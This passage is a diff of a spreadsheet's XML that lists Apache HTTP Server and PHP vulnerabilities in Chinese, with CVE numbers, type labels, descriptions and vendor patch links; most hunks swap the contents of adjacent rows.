+          <t>Protocol Bypass</t>
         </is>
       </c>
       <c r="E205" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F205" t="inlineStr">
         <is>
-          <t xml:space="preserve">Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4.52 及更早版本存在输入验证错误漏洞，该漏洞源于如果在 32 位系统上将 LimitXMLRequestBody 设置为允许大于 350MB（默认为 1M）的请求正文，则会发生整数溢出，随后会导致越界写入。
-</t>
+          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache HTTP Server 2.4版本至2.4.54之前版本存在环境问题漏洞，该漏洞源于从mod_proxy_ajp函数中发现包含HTTP请求走私漏洞。</t>
         </is>
       </c>
       <c r="G205" t="inlineStr">
@@ -25479,7 +25479,7 @@
       </c>
       <c r="J205" t="inlineStr">
         <is>
-          <t>CVE-2022-22721</t>
+          <t>CVE-2022-36760</t>
         </is>
       </c>
       <c r="K205" t="inlineStr">
@@ -27241,7 +27241,7 @@
     <row r="220">
       <c r="A220" t="inlineStr">
         <is>
-          <t>PHP incomplete_class.c 内存破坏漏洞(CVE-2015-4602)</t>
+          <t>PHP内存破坏漏洞(CVE-2015-4599)</t>
         </is>
       </c>
       <c r="B220" t="inlineStr">
@@ -27256,17 +27256,18 @@
       </c>
       <c r="D220" t="inlineStr">
         <is>
-          <t>Memory Corruption Exploit</t>
+          <t>memory corruption</t>
         </is>
       </c>
       <c r="E220" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://bugs.php.net/bug.php?id=69152</t>
         </is>
       </c>
       <c r="F220" t="inlineStr">
         <is>
-          <t>PHP的ext/standard/incomplete_class.c中的__PHP_Incomplete_Class函数在5.4.40之前，5.5.24之前的5.5.x和5.6.8之前的5.6.x中允许远程攻击者拒绝服务（应用程序崩溃）或可能执行通过意外的数据类型生成的任意代码，与“类型混淆”问题有关。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/soap/soap.c文件中的‘SoapFault：：__toString’方法存在安全漏洞。远程攻击者可借助数据类型利用该漏洞获取敏感信息，造成拒绝服务（应用程序崩溃），或执行任意代码。以下版本受到影响：PHP 5.4.40之前版本，5.5.24之前5.5.x版本，5.6.8之前5.6.x版本。</t>
         </is>
       </c>
       <c r="G220" t="inlineStr">
@@ -27286,7 +27287,7 @@
       </c>
       <c r="J220" t="inlineStr">
         <is>
-          <t>CVE-2015-4602</t>
+          <t>CVE-2015-4599</t>
         </is>
       </c>
       <c r="K220" t="inlineStr">
@@ -27361,7 +27362,7 @@
     <row r="221">
       <c r="A221" t="inlineStr">
         <is>
-          <t>PHP内存破坏漏洞(CVE-2015-4599)</t>
+          <t>PHP incomplete_class.c 内存破坏漏洞(CVE-2015-4602)</t>
         </is>
       </c>
       <c r="B221" t="inlineStr">
@@ -27376,18 +27377,17 @@
       </c>
       <c r="D221" t="inlineStr">
         <is>
-          <t>memory corruption</t>
+          <t>Memory Corruption Exploit</t>
         </is>
       </c>
       <c r="E221" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://bugs.php.net/bug.php?id=69152</t>
+          <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/</t>
         </is>
       </c>
       <c r="F221" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP的ext/soap/soap.c文件中的‘SoapFault：：__toString’方法存在安全漏洞。远程攻击者可借助数据类型利用该漏洞获取敏感信息，造成拒绝服务（应用程序崩溃），或执行任意代码。以下版本受到影响：PHP 5.4.40之前版本，5.5.24之前5.5.x版本，5.6.8之前5.6.x版本。</t>
+          <t>PHP的ext/standard/incomplete_class.c中的__PHP_Incomplete_Class函数在5.4.40之前，5.5.24之前的5.5.x和5.6.8之前的5.6.x中允许远程攻击者拒绝服务（应用程序崩溃）或可能执行通过意外的数据类型生成的任意代码，与“类型混淆”问题有关。</t>
         </is>
       </c>
       <c r="G221" t="inlineStr">
@@ -27407,7 +27407,7 @@
       </c>
       <c r="J221" t="inlineStr">
         <is>
-          <t>CVE-2015-4599</t>
+          <t>CVE-2015-4602</t>
         </is>
       </c>
       <c r="K221" t="inlineStr">
@@ -28203,7 +28203,7 @@
     <row r="228">
       <c r="A228" t="inlineStr">
         <is>
-          <t>PHP snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
+          <t>PHP simplestring_addn函数整数签名漏洞(CVE-2016-6296)</t>
         </is>
       </c>
       <c r="B228" t="inlineStr">
@@ -28218,7 +28218,7 @@
       </c>
       <c r="D228" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E228" t="inlineStr">
@@ -28228,7 +28228,7 @@
       </c>
       <c r="F228" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/snmp/snmp.c文件存在安全漏洞，该漏洞源于程序没有正确实现未序列化实施和垃圾数据回收的交互。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务（释放后重用和应用程序崩溃）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。GD是其中的一个图形扩展库组件。xmlrpc-epi是一套采用C语言开发的易于开发者使用的序列化RPC请求的API。PHP中使用的xmlrpc-epi 0.54.2及之前的版本中的simplestring.c文件中的‘simplestring_addn’函数存在整数符号错误漏洞。远程攻击者可通过向PHP xmlrpc_encode_request函数传递较长的参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
         </is>
       </c>
       <c r="G228" t="inlineStr">
@@ -28248,7 +28248,7 @@
       </c>
       <c r="J228" t="inlineStr">
         <is>
-          <t>CVE-2016-6295</t>
+          <t>CVE-2016-6296</t>
         </is>
       </c>
       <c r="K228" t="inlineStr">
@@ -28323,7 +28323,7 @@
     <row r="229">
       <c r="A229" t="inlineStr">
         <is>
-          <t>PHP simplestring_addn函数整数签名漏洞(CVE-2016-6296)</t>
+          <t>PHP snmp.c拒绝服务漏洞(CVE-2016-6295)</t>
         </is>
       </c>
       <c r="B229" t="inlineStr">
@@ -28338,7 +28338,7 @@
       </c>
       <c r="D229" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E229" t="inlineStr">
@@ -28348,7 +28348,7 @@
       </c>
       <c r="F229" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。GD是其中的一个图形扩展库组件。xmlrpc-epi是一套采用C语言开发的易于开发者使用的序列化RPC请求的API。PHP中使用的xmlrpc-epi 0.54.2及之前的版本中的simplestring.c文件中的‘simplestring_addn’函数存在整数符号错误漏洞。远程攻击者可通过向PHP xmlrpc_encode_request函数传递较长的参数利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/snmp/snmp.c文件存在安全漏洞，该漏洞源于程序没有正确实现未序列化实施和垃圾数据回收的交互。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务（释放后重用和应用程序崩溃）。以下版本受到影响：PHP 5.5.38之前的版本，5.6.24之前的5.6.x版本，7.0.9之前的7.x版本。</t>
         </is>
       </c>
       <c r="G229" t="inlineStr">
@@ -28368,7 +28368,7 @@
       </c>
       <c r="J229" t="inlineStr">
         <is>
-          <t>CVE-2016-6296</t>
+          <t>CVE-2016-6295</t>
         </is>
       </c>
       <c r="K229" t="inlineStr">
@@ -28563,7 +28563,7 @@
     <row r="231">
       <c r="A231" t="inlineStr">
         <is>
-          <t>PHP exif_process_ifd_in_makernote信息泄露漏洞(CVE-2016-6291)</t>
+          <t>PHP session.c拒绝服务漏洞(CVE-2016-6290)</t>
         </is>
       </c>
       <c r="B231" t="inlineStr">
@@ -28578,17 +28578,17 @@
       </c>
       <c r="D231" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E231" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.phphttp://php.net/ChangeLog-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F231" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c中的exif_process_IFD_in_MAKERNOTE函数在5.5.38之前的版本，5.6.24之前的5.6.x和7.0.9之前的7.x允许远程攻击者拒绝服务（越界数组）访问和内存损坏），从进程内存中获取敏感信息，或者可能通过精心制作的JPEG图像产生未指定的其他影响。</t>
+          <t>PHP中的ext/session/session.c，5.6.24之前的5.6.x和7.0.9之前的7.x无法正确维护特定的哈希数据结构，这使远程攻击者可以拒绝服务（免费使用）或可能通过与会话反序列化相关的向量产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G231" t="inlineStr">
@@ -28608,7 +28608,7 @@
       </c>
       <c r="J231" t="inlineStr">
         <is>
-          <t>CVE-2016-6291</t>
+          <t>CVE-2016-6290</t>
         </is>
       </c>
       <c r="K231" t="inlineStr">
@@ -28683,7 +28683,7 @@
     <row r="232">
       <c r="A232" t="inlineStr">
         <is>
-          <t>PHP session.c拒绝服务漏洞(CVE-2016-6290)</t>
+          <t>PHP exif_process_ifd_in_makernote信息泄露漏洞(CVE-2016-6291)</t>
         </is>
       </c>
       <c r="B232" t="inlineStr">
@@ -28698,17 +28698,17 @@
       </c>
       <c r="D232" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E232" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.phphttp://php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F232" t="inlineStr">
         <is>
-          <t>PHP中的ext/session/session.c，5.6.24之前的5.6.x和7.0.9之前的7.x无法正确维护特定的哈希数据结构，这使远程攻击者可以拒绝服务（免费使用）或可能通过与会话反序列化相关的向量产生未指定的其他影响。</t>
+          <t>PHP的ext/exif/exif.c中的exif_process_IFD_in_MAKERNOTE函数在5.5.38之前的版本，5.6.24之前的5.6.x和7.0.9之前的7.x允许远程攻击者拒绝服务（越界数组）访问和内存损坏），从进程内存中获取敏感信息，或者可能通过精心制作的JPEG图像产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G232" t="inlineStr">
@@ -28728,7 +28728,7 @@
       </c>
       <c r="J232" t="inlineStr">
         <is>
-          <t>CVE-2016-6290</t>
+          <t>CVE-2016-6291</t>
         </is>
       </c>
       <c r="K232" t="inlineStr">
@@ -28803,7 +28803,7 @@
     <row r="233">
       <c r="A233" t="inlineStr">
         <is>
-          <t>PHP grapheme_strpos拒绝服务漏洞(CVE-2016-4541)</t>
+          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
         </is>
       </c>
       <c r="B233" t="inlineStr">
@@ -28823,12 +28823,12 @@
       </c>
       <c r="E233" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
         </is>
       </c>
       <c r="F233" t="inlineStr">
         <is>
-          <t>PHP中ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_strpos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
+          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
         </is>
       </c>
       <c r="G233" t="inlineStr">
@@ -28848,7 +28848,7 @@
       </c>
       <c r="J233" t="inlineStr">
         <is>
-          <t>CVE-2016-4541</t>
+          <t>CVE-2016-4543</t>
         </is>
       </c>
       <c r="K233" t="inlineStr">
@@ -28923,7 +28923,7 @@
     <row r="234">
       <c r="A234" t="inlineStr">
         <is>
-          <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
+          <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
         </is>
       </c>
       <c r="B234" t="inlineStr">
@@ -28938,17 +28938,17 @@
       </c>
       <c r="D234" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E234" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
         </is>
       </c>
       <c r="F234" t="inlineStr">
         <is>
-          <t>PHP的ext/xml/xml.c中的ext_xml/xml.c中的xml_parse_into_struct函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（缓冲区读取不足和分段）错误）或可能通过第二个参数中的精心制作的XML数据产生未指定的其他影响，从而导致解析器级别为零。</t>
+          <t>PHP的ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_stripos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G234" t="inlineStr">
@@ -28968,7 +28968,7 @@
       </c>
       <c r="J234" t="inlineStr">
         <is>
-          <t>CVE-2016-4539</t>
+          <t>CVE-2016-4540</t>
         </is>
       </c>
       <c r="K234" t="inlineStr">
@@ -29043,7 +29043,7 @@
     <row r="235">
       <c r="A235" t="inlineStr">
         <is>
-          <t>PHP exif_process_ifd_tag拒绝服务漏洞(CVE-2016-4542)</t>
+          <t>PHP bcpowmod 函数拒绝服务漏洞(CVE-2016-4537)</t>
         </is>
       </c>
       <c r="B235" t="inlineStr">
@@ -29063,12 +29063,12 @@
       </c>
       <c r="E235" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
         </is>
       </c>
       <c r="F235" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c中的exif_process_IFD_TAG函数在5.5.35之前的版本，5.6.21之前的5.6.x和7.0.6之前的7.x不能正确构造spprintf参数，这使远程攻击者可以拒绝服务（越界读取）或可能通过精心制作的标头数据产生未指定的其他影响。</t>
+          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x接受scale参数的负整数，这使远程攻击者可以导致拒绝服务或可能通过精心设计的呼叫产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G235" t="inlineStr">
@@ -29088,7 +29088,7 @@
       </c>
       <c r="J235" t="inlineStr">
         <is>
-          <t>CVE-2016-4542</t>
+          <t>CVE-2016-4537</t>
         </is>
       </c>
       <c r="K235" t="inlineStr">
@@ -29163,7 +29163,7 @@
     <row r="236">
       <c r="A236" t="inlineStr">
         <is>
-          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
+          <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
         </is>
       </c>
       <c r="B236" t="inlineStr">
@@ -29178,17 +29178,17 @@
       </c>
       <c r="D236" t="inlineStr">
         <is>
-          <t>DoS</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E236" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
         </is>
       </c>
       <c r="F236" t="inlineStr">
         <is>
-          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
+          <t>PHP的ext/xml/xml.c中的ext_xml/xml.c中的xml_parse_into_struct函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（缓冲区读取不足和分段）错误）或可能通过第二个参数中的精心制作的XML数据产生未指定的其他影响，从而导致解析器级别为零。</t>
         </is>
       </c>
       <c r="G236" t="inlineStr">
@@ -29208,7 +29208,7 @@
       </c>
       <c r="J236" t="inlineStr">
         <is>
-          <t>CVE-2016-4538</t>
+          <t>CVE-2016-4539</t>
         </is>
       </c>
       <c r="K236" t="inlineStr">
@@ -29283,7 +29283,7 @@
     <row r="237">
       <c r="A237" t="inlineStr">
         <is>
-          <t>PHP Exif_process_ifd_in_jpeg拒绝服务漏洞(CVE-2016-4543)</t>
+          <t>PHP grapheme_strpos拒绝服务漏洞(CVE-2016-4541)</t>
         </is>
       </c>
       <c r="B237" t="inlineStr">
@@ -29303,12 +29303,12 @@
       </c>
       <c r="E237" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
         </is>
       </c>
       <c r="F237" t="inlineStr">
         <is>
-          <t>PHP的ext/exif/exif.c文件中的‘exif_process_IFD_in_JPEG’函数存在安全漏洞，该漏洞源于程序没有验证IFD大小。远程攻击者可借助特制的头部数据利用该漏洞造成拒绝服务（越边界读取）。</t>
+          <t>PHP中ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_strpos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G237" t="inlineStr">
@@ -29328,7 +29328,7 @@
       </c>
       <c r="J237" t="inlineStr">
         <is>
-          <t>CVE-2016-4543</t>
+          <t>CVE-2016-4541</t>
         </is>
       </c>
       <c r="K237" t="inlineStr">
@@ -29403,7 +29403,7 @@
     <row r="238">
       <c r="A238" t="inlineStr">
         <is>
-          <t>PHP bcpowmod 函数拒绝服务漏洞(CVE-2016-4537)</t>
+          <t>PHP Bcpowmod 函数拒绝服务漏洞(CVE-2016-4538)</t>
         </is>
       </c>
       <c r="B238" t="inlineStr">
@@ -29423,12 +29423,12 @@
       </c>
       <c r="E238" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
         </is>
       </c>
       <c r="F238" t="inlineStr">
         <is>
-          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x接受scale参数的负整数，这使远程攻击者可以导致拒绝服务或可能通过精心设计的呼叫产生未指定的其他影响。</t>
+          <t>PHP中ext/bcmath/bcmath.c中的bcpowmod函数在5.5.35之前，5.6.21之前的5.6.x和7.0.6之前的7.x中修改某些数据结构，而无需考虑它们是否是_zero_，_one_，或_two_全局变量，它允许远程攻击者通过精心设计的调用导致拒绝服务或可能造成未指定的其他影响。</t>
         </is>
       </c>
       <c r="G238" t="inlineStr">
@@ -29448,7 +29448,7 @@
       </c>
       <c r="J238" t="inlineStr">
         <is>
-          <t>CVE-2016-4537</t>
+          <t>CVE-2016-4538</t>
         </is>
       </c>
       <c r="K238" t="inlineStr">
@@ -29523,7 +29523,7 @@
     <row r="239">
       <c r="A239" t="inlineStr">
         <is>
-          <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
+          <t>PHP exif_process_ifd_tag拒绝服务漏洞(CVE-2016-4542)</t>
         </is>
       </c>
       <c r="B239" t="inlineStr">
@@ -29543,12 +29543,12 @@
       </c>
       <c r="E239" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=082aecfc3a753ad03be82cf14f03ac065723ec92</t>
         </is>
       </c>
       <c r="F239" t="inlineStr">
         <is>
-          <t>PHP的ext/intl/grapheme/grapheme_string.c中5.5.35之前的grapheme_stripos函数，5.6.21之前的5.6.x和7.0.6之前的7.x允许远程攻击者拒绝服务（边界读取），或者可能通过负偏移产生未指定的其他影响。</t>
+          <t>PHP的ext/exif/exif.c中的exif_process_IFD_TAG函数在5.5.35之前的版本，5.6.21之前的5.6.x和7.0.6之前的7.x不能正确构造spprintf参数，这使远程攻击者可以拒绝服务（越界读取）或可能通过精心制作的标头数据产生未指定的其他影响。</t>
         </is>
       </c>
       <c r="G239" t="inlineStr">
@@ -29568,7 +29568,7 @@
       </c>
       <c r="J239" t="inlineStr">
         <is>
-          <t>CVE-2016-4540</t>
+          <t>CVE-2016-4542</t>
         </is>
       </c>
       <c r="K239" t="inlineStr">
@@ -29643,7 +29643,7 @@
     <row r="240">
       <c r="A240" t="inlineStr">
         <is>
-          <t>PHP wddx.c释放后重利用漏洞(CVE-2016-3141)</t>
+          <t>PHP 基于栈的缓冲区溢出漏洞(CVE-2016-2554)</t>
         </is>
       </c>
       <c r="B240" t="inlineStr">
@@ -29663,12 +29663,13 @@
       </c>
       <c r="E240" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://secure.php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://bugs.php.net/bug.php?id=71488</t>
         </is>
       </c>
       <c r="F240" t="inlineStr">
         <is>
-          <t>PHP 5.5.32及之前版本和5.6.19之前5.6.x版本的WDDX扩展中的wddx.c文件存在释放后重用漏洞。远程攻击者可通过触发包含特制var元素的XML数据上的wddx_deserialize调用，利用该漏洞造成拒绝服务（内存损坏和应用程序崩溃）。</t>
+          <t>5.5.32之前的PHP，ext.phar/tar.c中基于堆栈的缓冲区溢出，5.6.18之前的5.6.x和7.0.3之前的7.x允许远程攻击者拒绝服务（应用程序崩溃）或可能通过精心制作的TAR档案具有未指定的其他影响。</t>
         </is>
       </c>
       <c r="G240" t="inlineStr">
@@ -29688,7 +29689,7 @@
       </c>
       <c r="J240" t="inlineStr">
         <is>
-          <t>CVE-2016-3141</t>
+          <t>CVE-2016-2554</t>
         </is>
       </c>
       <c r="K240" t="inlineStr">
@@ -29763,7 +29764,7 @@
     <row r="241">
       <c r="A241" t="inlineStr">
         <is>
-          <t>PHP 基于栈的缓冲区溢出漏洞(CVE-2016-2554)</t>
+          <t>PHP wddx.c释放后重利用漏洞(CVE-2016-3141)</t>
         </is>
       </c>
       <c r="B241" t="inlineStr">
@@ -29783,13 +29784,12 @@
       </c>
       <c r="E241" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://bugs.php.net/bug.php?id=71488</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://secure.php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F241" t="inlineStr">
         <is>
-          <t>5.5.32之前的PHP，ext.phar/tar.c中基于堆栈的缓冲区溢出，5.6.18之前的5.6.x和7.0.3之前的7.x允许远程攻击者拒绝服务（应用程序崩溃）或可能通过精心制作的TAR档案具有未指定的其他影响。</t>
+          <t>PHP 5.5.32及之前版本和5.6.19之前5.6.x版本的WDDX扩展中的wddx.c文件存在释放后重用漏洞。远程攻击者可通过触发包含特制var元素的XML数据上的wddx_deserialize调用，利用该漏洞造成拒绝服务（内存损坏和应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G241" t="inlineStr">
@@ -29809,7 +29809,7 @@
       </c>
       <c r="J241" t="inlineStr">
         <is>
-          <t>CVE-2016-2554</t>
+          <t>CVE-2016-3141</t>
         </is>
       </c>
       <c r="K241" t="inlineStr">
@@ -30364,7 +30364,7 @@
     <row r="246">
       <c r="A246" t="inlineStr">
         <is>
-          <t>PHP wddx_stack_destroy函数释放后重用漏洞(CVE-2016-7413)</t>
+          <t>PHP wddx_deserialize()拒绝服务漏洞(CVE-2016-7129)</t>
         </is>
       </c>
       <c r="B246" t="inlineStr">
@@ -30384,13 +30384,12 @@
       </c>
       <c r="E246" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=16023f3e3b9c06cf677c3c980e8d574e4c162827</t>
         </is>
       </c>
       <c r="F246" t="inlineStr">
         <is>
-          <t>5.6.26之前的PHP中ext/wddx/wddx.c中的wddx_stack_destroy函数中的free-after-free漏洞使远程攻击者可以通过wddxPacket拒绝服务或可能造成未指定的其他影响，这可能导致远程攻击者拒绝服务缺少记录集字段元素的结束标签的XML文档，从而导致wddx_deserialize调用中的处理不当。</t>
+          <t>PHP的ext/wddx/wddx.c中的php_wddx_process_data函数以及在7.0.10之前的7.x中的php_wddx_process_data功能允许远程攻击者通过无效的ISO 8601时间导致拒绝服务（分段错误）或可能产生未指定的其他影响wddx_deserialize调用演示了错误的值，该调用对wddxPacket XML文档中的dateTime元素进行了错误处理。</t>
         </is>
       </c>
       <c r="G246" t="inlineStr">
@@ -30410,7 +30409,7 @@
       </c>
       <c r="J246" t="inlineStr">
         <is>
-          <t>CVE-2016-7413</t>
+          <t>CVE-2016-7129</t>
         </is>
       </c>
       <c r="K246" t="inlineStr">
@@ -30485,7 +30484,7 @@
     <row r="247">
       <c r="A247" t="inlineStr">
         <is>
-          <t>PHP wddx_deserialize()拒绝服务漏洞(CVE-2016-7129)</t>
+          <t>PHP wddx_stack_destroy函数释放后重用漏洞(CVE-2016-7413)</t>
         </is>
       </c>
       <c r="B247" t="inlineStr">
@@ -30505,12 +30504,13 @@
       </c>
       <c r="E247" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=16023f3e3b9c06cf677c3c980e8d574e4c162827</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F247" t="inlineStr">
         <is>
-          <t>PHP的ext/wddx/wddx.c中的php_wddx_process_data函数以及在7.0.10之前的7.x中的php_wddx_process_data功能允许远程攻击者通过无效的ISO 8601时间导致拒绝服务（分段错误）或可能产生未指定的其他影响wddx_deserialize调用演示了错误的值，该调用对wddxPacket XML文档中的dateTime元素进行了错误处理。</t>
